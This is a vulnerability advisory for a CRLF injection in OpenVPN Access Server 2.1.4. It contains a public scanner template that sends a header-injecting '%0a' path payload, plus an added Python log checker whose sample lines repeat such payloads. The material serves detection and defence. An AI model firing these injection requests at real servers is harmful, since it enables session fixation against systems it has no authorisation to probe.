CVE-2017-5868: OpenVPN Access Server 2.1.4 - CRLF Injection

Date: 2025-08-01 | Affected software: OpenVPN Access Server | PoC: public

Vulnerability description

CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to __session_start__/.

PoC code [public]

id: CVE-2017-5868

info:
  name: OpenVPN Access Server 2.1.4 - CRLF Injection
  author: ritikchaddha
  severity: medium
  description: |
    CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to __session_start__/.
  reference:
    - https://www.openwall.com/lists/oss-security/2017/05/23/13
    - http://www.securitytracker.com/id/1038547
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5868
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-5868
    cwe-id: CWE-93
    epss-score: 0.05514
    epss-percentile: 0.89876
    cpe: cpe:2.3:a:openvpn:openvpn_access_server:2.1.4:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openvpn
    product: openvpn_access_server
    shodan-query: cpe:"cpe:2.3:a:openvpn:openvpn_access_server"
  tags: cve,cve2017,openvpn,crlf

http:
  - method: GET
    path:
      - "{{BaseURL}}/__session_start__/%0aSet-Cookie:%20crlfinjection=1;"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          # (?m) makes ^ match at the start of every line of the header block
          - "(?m)^Set-Cookie: crlfinjection=1;"

      - type: status
        status:
          - 302
# digest: 4a0a004730450220572b624c7cf179f22bcdb3e30a8a0861d9966190d7986e91b0ee0197cc092f7f022100fff70c1bd6849d68ab33019a31ffd88740977984303f45c8c9561095455238b8:922c64590222798bb761d5b6d8e72950
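
A log-side check for the request described on this page, as an added example that is not part of the original template or of OpenVPN's code: it flags access-log entries whose path under `/__session_start__/` decodes to a CR or LF. The combined log format, the sample lines and the function names are assumptions constructed for illustration; the check goes beyond the single `%0A` case on the page by also covering `%0D` and double-encoded forms.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not taken from a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Aug/2025:10:00:01 +0000] "GET /__session_start__/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Aug/2025:10:00:05 +0000] "GET /__session_start__/%0aSet-Cookie:%20crlfinjection=1; HTTP/1.1" 302 0 "-" "curl/8.0"
198.51.100.9 - - [01/Aug/2025:10:00:09 +0000] "GET /__session_start__/%250D%250AX-Test:%201 HTTP/1.1" 302 0 "-" "curl/8.0"
203.0.113.4 - - [01/Aug/2025:10:01:00 +0000] "GET /admin/%0a HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# Assumed log layout: client IP first, quoted request line, then the status code.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)


def fully_decode(target, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%250a) is exposed too."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def find_crlf_requests(log_text, prefix="/__session_start__/"):
    """Return one record per request whose decoded path under `prefix` holds CR or LF."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path = fully_decode(m["target"].split("?", 1)[0])
        if path.startswith(prefix) and re.search(r"[\r\n]", path):
            # Everything after the first line break is what would land in the headers.
            injected = re.split(r"[\r\n]+", path, maxsplit=1)[1]
            hits.append({"line": lineno, "ip": m["ip"],
                         "status": int(m["status"]), "injected": injected})
    return hits


if __name__ == "__main__":
    for hit in find_crlf_requests(SAMPLE_LOG):
        print(hit)
```

A 302 status on a flagged entry matches the response the template above expects from an affected server, so those entries are the ones to review first.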